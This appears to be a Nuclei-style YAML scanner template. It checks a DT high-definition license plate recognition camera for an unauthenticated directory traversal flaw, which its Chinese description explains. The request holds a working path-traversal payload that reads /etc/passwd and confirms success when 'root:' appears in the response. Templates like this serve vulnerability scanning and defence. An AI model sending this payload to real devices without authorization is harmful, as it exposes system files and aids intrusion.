id: DT-File-reading

info:
  name: "DT-高清车牌识别摄像机目录遍历漏洞任意文件读取"
  author: Unknown
  severity: high
  description: DT-高清车牌识别摄像机存在目录遍历漏洞，远程攻击者无需身份验证即可访问受限文件，从而泄露系统配置及服务器信息，显著增加系统被入侵的风险。攻击载荷通过路径穿越语法绕过文件访问控制机制，实现对敏感文件的非授权读取。
  tags: DT-高清车牌识别摄像机

http:
- raw:
  - |
    GET /../../../../etc/passwd HTTP/1.1
    Host: {{Hostname}}

  matchers-condition: and
  matchers:
  - type: word
    part: body
    words:
    - 'root:'
  - type: status
    status:
    - 200